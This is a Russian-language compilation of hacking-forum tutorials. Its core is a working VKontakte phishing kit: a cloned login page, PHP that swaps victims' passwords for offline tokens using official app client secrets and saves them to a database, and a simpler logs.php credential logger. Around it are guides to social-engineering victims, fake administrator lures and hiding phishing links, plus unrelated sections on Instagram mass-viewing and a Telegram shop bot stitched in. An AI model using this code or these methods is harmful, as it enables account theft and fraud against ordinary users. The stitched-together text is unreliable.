Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Выполнять авторизацию будем, представляясь официальным приложением. Запрос на прямую авторизацию выглядит примерно так:

Код:

https://api.vk.com/oauth/token?grant_type=password&client_id=[наше значение]&scope=[наше значение]&client_secret=[наше значение]&username=[наше значение]&password=[наше значение]

Что все это значит:

• clenit_id - это id нашего приложения. Запишем в client_id значение 2274003.
• scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не будем, а просто запросим офлайн токен, записав в scope значение "offline". Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !Важно: такой токен "живет" до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности.
• client_secret - секретный ключ Вашего приложения. Будет равен hHbZxrka2uZ6jB1inYsH
• username - логин пользователя ВКонтакте
• password - пароль пользователя ВКонтакте

Варианты официальных clenit_id и client_secret

Android:

client_id: 2274003

client_secret: hHbZxrka2uZ6jB1inYsH

IPhone:

client_id: 3140623

client_secret: VeWdmVclDCtn6ihuP1nt

IPad:

client_id: 3682744

client_secret: mY6CDUswIVdJLCD3j15n

Windows desktop:

client_id: 3697615

client_secret: AlVXZFMUqyrnABp8ncuU

Windows phone:

client_id: 3502557

client_secret: PEObAuQi6KloPM4T30DV

Теперь необходима форма авторизации как в вк.

Создадим php документ authorize.php

authorize.php:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
  <?php
  $errorGet = $_GET['error_login'];
    if (!$errorGet)
    {
        echo "<style>
        #hide_row_pass {display: none;}
        </style>";
    }
else
    {
        echo "<style>
        #hide_row_pass {display: block;}
        </style>";
    }
  ?>
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title>ВКонтакте | Вход</title>
    <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" />
    <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link>
  </head>

  <body class="VK oauth_centered">
    <script>
      if (window.devicePixelRatio >= 2) document.body.className += ' is_2x';
    </script>
    <div class="oauth_wrap">
      <div class="oauth_wrap_inner">
        <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">
    <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a>
  </div>
</div>

<div class="oauth_content box_body clear_fix">
  <div class="box_msg_gray box_msg_padded">Для продолжения Вам необходимо войти <b>ВКонтакте</b>.</div>

  <form method="POST" id="login_submit" action="login.php">
    <div class="oauth_form">
  
    <div id="hide_row_pass" class="box_error">Указан неверный логин или пароль.</div>
      <div class="oauth_form_login">
        <div class="oauth_form_header">Телефон или email</div>
        <input type="text" class="oauth_form_input dark" name="login" value="">
        <div class="oauth_form_header">Пароль</div>
        <input type="password" class="oauth_form_input dark" name="password" />
  
        <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button>
        <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a>
      </div>
    </div>
  </form>
</div>
        </div>
      </div>
    </div>
  </body>
</html>

Архив со всеми картинками и стилями:

https://t.me/slivmens/1148

Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и получение токена. Назовем login.php

Но перед этим создадим БД куда будем записывать все валидные данные.

1. Переходим на хостинге в PhpMyAdmin и нажимаем "Создать"

2. Создадим таблицу на 7 столбцов

3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя (first_name) и Фамилия (last_name) зададим как на картинке

В параметрах столбца id должен быть отмечен параметр "A_I" (auto_increment) и стоять PRIMARY KEY.

Теперь сам файл login.php:

<?php
//Создадим headers
$headers = array(
'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'content-type' => 'application/x-www-form-urlencoded',
'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
//Запишем сюда значения логина и пароля из HTML формы
$login = $_POST['login'];
$password = $_POST['password'];
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
    header('Location: /authorize.php?error_login=true');
    exit;
}
    else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
    'headers' => array(
    'accept: '.$headers['accept'],
    'content-type: '.$headers['content-type'],
    'user-agent: '.$headers['user-agent']
    )
    ));
//Если авторизация прошла успешно
if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
{
    $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
   $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

   //Записываем в переменную текущую дату и время сервера
$date_l = date("H:i:s  d-m-Y");
//Подключаемся к БД
    $host="localhost";
    $user=""; //Имя пользователя от MySql
    $pass=""; //Пароль от MySql
    $db_name=""; //Имя базы
    $link=mysql_connect($host,$user,$pass);
    mysql_select_db($db_name,$link);
    mysql_query("set names utf8");
//Выполняем запись валида в БД
    $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
    if ($sql) {
        session_start();
        $_SESSION['logged_user'] = $data['response'][0]['first_name'];
        header('Location: vk.com/');
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
    } else header('Location: /authorize.php?error_login=true');
//Закрываем соединение
mysql_close($link);
exit;
}
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с  ошибкой
else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

if(isset($params['params'])) {
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
}

if(isset($params['headers'])) {
  curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
}

if(isset($params['cookies'])) {
  curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
}

if($proxy) {
  curl_setopt($ch, CURLOPT_PROXY, $proxy);

  if($proxy_userpwd) {
   curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
  }
}

$result = curl_exec($ch);
$result_explode = explode("\r\n\r\n", $result);

$headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
$content = $result_explode[count($result_explode) - 1];


preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

$cookies = implode(';', $parse_cookies[1]);

curl_close($ch);

return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>

В переменные $host="localhost";

$user=""; //Имя пользователя от MySql

$pass=""; //Пароль от MySql

$db_name=""; //Имя базы

вписываем наши данные

На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно.

header('Location: "Ваш сайт" ');

Осталось залить все файлы на хостинг и можно фишить.

Новая фишка в инсте по продвижению —

это массовый просмотр историй.

Думаю здесь уже все знают о таком, но почему бы не рассказать.

Что такое масслукинг?

Масслукинг — это автоматический просмотр чужих инстаграм историй от имени вашего аккаунта.

1. Личный аккаунт

от 3к подписчиков(желательно от года + авторизован с телефона)

2. Чистая прокся IPv4 и выключить 2-факторку!

3. Первый вход лучше выполнить с домашнего айпи (если вылезет "это я" - подтвердить с телефона)

4. Кого смотрим?

Думаю логично - целевую аудиторию.

Это или собственные подписчики, или люди из профилей конкурентов.

Их можно подобрать по параметрам или спарсить (ниже об этом).

5. Какой лимит?

Существует мнение, что лимит по сторис - 80 000 просмотров в сутки.

Но, чтобы обезопасить аккаунт, лучше не превышать цифру в 5 000 просмотров в день.

6. Какой тайм-аут между просмотрами?

Стандартный 10 - 60 секунд.

Предпочтительный 20 - 30 секунд (для аккаунтов, старше 6 месяцев, для молодых время лучше увеличить).

7. Сколько смотрим?

Обычно пользователи загружают 5-7 сторис в день, поэтому советую запускать 10 просмотров на одного пользователя, так точно не ошибетесь.

Привет! То, что сегодня опишу в данной статье - уголовно наказуемо.Поэтому я заранее подготовил несколько аккаунтов для получения к ним доступа. Больше всего внимания в этой статье я уделю социальной инженерии, так как практически все способы построены на ней.

Основные способы взлома.

К таким способам относятся:

• Фишинг
• Подбор пароля(Brute force)
• MITM (Man In The Middle)
• Используя малварь

Фишинг - способ основанный на клонировании страницы авторизации какой-либо социальной сети.

Brute Force - подбор пароля с использованием различных баз.

Этот способ не всегда эффективен но последнее время часто используем.

Используя малварь. К примеру кейлоггер. Он записывает все введенное с клавиатуры и отправляет злоумышленнику.

Шаг 1. - Сбор информации.

Всегда перед взломом(не обязательно аккаунта) нужно собрать как можно больше информации. Для начала нужно обратить внимание на страницу пользователя. В качестве примера возьмем социальную сеть Вконтакте. Обратите внимание на посты закрепленные на странице у пользователя, на его статус. Также попробуйте разобраться какую музыку любит пользователь, обратите внимание на фотографии пользователя. Из всего этого можно взять много информации. Теперь обратим наш взор на контактную информацию. Советую записывать найденные вами данные. Чаще всего номер либо не указывают, либо пишут не верный. Город тоже важная деталь.

Теперь перейдем к взаимодействию с пользователем. Вот тут мы отработаем наши навыки в социальной инженерии. Создаем страницу в этой социальной сети(в нашем случае вконтакте). Я создал страницу молодой девушки и добавил на страницу много различных фотографий. Раскрутил страницу для меньшей опасности раскрытия. И писал первым попадающимся мне на глаза дабы потренировать свою социальную инженерию.

Вот что из этого вышло:

Мы вошли в доверие человека спустя много дней общения(я не стал проводить над ним эксперименты и дальше так как он и вправду поверил что я девушка). Исходя из переписки я получил много различной информации в числе которой был номер телефона, род деятельности, год рождения и.т.п. Будьте осторожны в социальных сетях. А на этом первый шаг закончен.

Шаг 2. - Выбор способа.

Здесь все зависит от того как вы вошли в доверие. И еще, не важно какой способ вы выберете первым. Если не сработает один способ можно попробовать другой. Повторяюсь, все зависит от того как вы вошли в доверие.

Представим что я узнал только то, что человек любит смотреть сериал Сверхестественное. В этом случае я могу первым выбрать фишинг или отослать ему малварь. Под предлогом "Смотри! Серия которой еще нет в эфире". Человек скачивает , открывает(правда придется помучится с форматами файла и обходом av) думает что все нормально. Но при следующем его заходе в социальную сеть данные отправляются нам.

Если же вы плохо вошли в доверие, но сумели собрать достаточно информации, то можно изначально подобрать пароль. Основываясь на полученной информации можно составить много паролей. Правда перед этим советую поискать по базам со стандартными(часто используемыми) паролями.

Шаг 3. - Осуществление способа.

Фишинг.

Это способ является самым популярным. Но я внес некоторые свои изменения и упрощения. Давайте создадим фишинговый сайт по подобию все того же вконтакте. В добавок хотел бы сказать что фишинг уже не является эффективным способом. Но для общего понимания мы его разберем.

1. Переходим на страницу авторизации --> пкм --> сохранить как --> test_fish.

Получили папку и один файл

2. Теперь при помощи текстового редактора откроем файл test_fish.

Первым же делом ищем

<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login" target="quick_login_frame">

И меняем его на

<form method="POST" name="login" id="quick_login_form" action="./logs.php" target="quick_login_frame">

Теперь ищем строку 215 - 219( js код)

Над ней пишем

<!--

Далее ищем строку закрывающую тело тега script.

И после этой строки снова пишем

Код:

-->

Тем самым мы за комментировали js код который нам не пригодится и может вызвать торможение в работе. Осталось сохранить этот файл.

Что же, а теперь создайте файл logs.php с таким содержимым:

<?php

$login = $_POST['email'];

$pass = $_POST['pass'];

$file = fopen("my_pass.txt", 'at');

fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");

fclose($file);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";

?>

Логика работы

Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php

Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код

<form method = 'GET' action = 'http://mysite/login.php'>

<label> Login:</label>

<input type = "text" name = "login" />

<label> Password:</label>

<input type = "password" name = "passwd" />

<input type = "button" />

</form>

То начало нашего скрипта logs.php выглядело бы так

<?php

$login = $_GET['login'];

$pass = $_GET['passwd'];

.....

Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.

В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это

И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга

В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же "жертве" из примера что-то такое:

Привет!

Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой/Смотри в этой версии можно осуществлять звонки друг другу

Держи <ССЫЛКА>

Или же можно поступить интересней. Попробуем воздействовать на "жертву" как администрация.

Для этого на фейковом аккаунте создаем паблик.

И в названии указываем “Администрация”

Далее загрузим аватар как у админа И начинаем создавать заметку в сообществе

...

Уважаемый пользователь!

Мы заметили на вашей странице подозрительную активность и были бы признательны, если вы перейдете по ссылке ниже и заполните анкету. В случае отказа нам придется заблокировать доступ к вашему аккаунту.

Ссылка(Фейк): http://feyk-site.com

@id(ид номер пользователя)

...

Как обезопасить фишинг

Во всем есть свои минусы. Фишинг палится не так части внешним видом, как самим url на него.

Давайте попробуем обезопасить его простейшим скриптом. Скрипт будет открывать какую-либо новую вкладку, а ту вкладку с которой перешли на фишинг заменять самим фишингом. Читается не понятно, но на деле все просто.

Сам скрипт выглядит так

Его сохраняем как index.html

И при переходе увидим профит

Для скрытия нашего URL мы можем использовать следующие способы:

1. Сокращение ссылки.

2. Используя blogger.com

Сократить ссылку мы можем на различных онлайн сервисах, это сделать очень просто.

Так что мы рассмотрим только способ 2.

1. Переходим на blogger.com

2. Регистрируем аккаунт à блог

3. Переходим к пункту шаблон à изменить html

4. На стороннем ресурсе сократить ссылку на фишинг

5. Вставляем в теле <head></head> код ниже

И соответственно сохраняем. Теперь ссылка на блог будет ридеректить жертву на ваш фишинг причем вконтакте не спалит.

Приступим:

Для того, чтобы наш магазин работал 24/7 нам нужно создать бота.

Пишем команду боту “/start” и ждем ответа от бота.

После того, как бот нам ответил, мы видим множество функций, нам нужно написать “/newbot”

Теперь нам нужно придумать имя для бота. Я же назову его “OberShop”.

Дальше нам нужно придумать адрес бота, чтобы другие пользователи могли найти ваш магазин. Для примера выбрал адрес “testobershop_bot”. Обязательно после адреса указывайте “_bot”.

Если вы сделали всё правильно, то у вас появится такое сообщение. Из этого сообщения нам нужно скопировать token бота. Что такое “Токен” ? Токен предназначен для электронного удостоверения личности.

Регистрация на сайте, для создания магазина

Основную работу мы выполнили, получив токен бота, теперь нам нужно зарегистрироваться на сайте. Мы будем использовать сайт “Tbiz”, он предоставляет 3 дня бесплатного использования магазина, дальше будет платно. За 3 дня можно понять нужен ли вам такой магазин или нет.

Переходим на сайт “https://tbiz.pro/login”

Вписываем все необходимые данные, и ставим все галочки. И нажимаем на кнопку “Зарегистрироваться”.

После того, как успешно зарегистрировались, нас перенаправляет в панель управления. В верхнем левом углу нажимаем кнопку “Создать Магазин”.

У нас появилось окно “Новый магазин”. В строку вставляем Токен нашего бота.

Если вы сделали всё правильно, то у вас появляется “Конструктор”. В верхнем левом углу, мы видим адрес нашего бота, если он у вас не высвечивается - это означает, что вы допустили ошибку и вас следует перепроверить токен.

Разбор функций сайта

Заказы -в этом разделе мы будем видеть, кто купил наш товар.

Товары - в этом разделе мы будем видеть, какие у нас есть товары.

Пользователи - в этом разделе мы будем видеть, кто использует наш магазин.

Рассылки - Тут мы может выбрать пользователей нашего магазина и выполнить рассылку.

Продвижение - в этом разделе у нас появится окно со способами продвижения.

Реф. программа - Здесь мы можем создать бонусы для покупателей

Настройки магазина - Здесь мы может полностью настроить наш магазин.

Настройка оплаты - в этом разделе мы будем указывать наши реквизиты

"Мозги" для магазина

Переходим в раздел “Конструтор” ( https://tbiz.pro/settings/constructor )

В левом половине сайта, мы видим поле для “Приветствия”. Я указал краткое приветствие для покупателя

В правой половине сайта, мы видим поле с кнопками. Для того, чтобы добавить свою кнопку нужно нажать “Добавить кнопку”.

У нас появляется окно для ввода данных для кнопки. Я написал краткую информацию.

Переходим в раздел “Товары” ( https://tbiz.pro/goods ).

В верхнем правом углу нажимаем “Добавить товар”.

Тут указываем все необходимые данные и нажимаем “Добавить товар”.

Видим, что всё успешно создалось, теперь загружаем материал. Материал у нас появится после оплаты товара

В появившемся окне указываем необходимые данные

Переходим в раздел “Настройка оплаты” ( https://tbiz.pro/settings/methods_pay ).

Видим, что нужен секретный ключ киви. Важно нам нужно только указать “Просмотр истории платежей”.

Переходим по ссылке ( https://qiwi.com/api ).

И нажимаем кнопку выпустить новый токен. Тут ставим галочку только “Просмотр истории платежей”.

Копируем наш токен в киви и вставляем его в поля “Настройка оплаты”. И сохраняем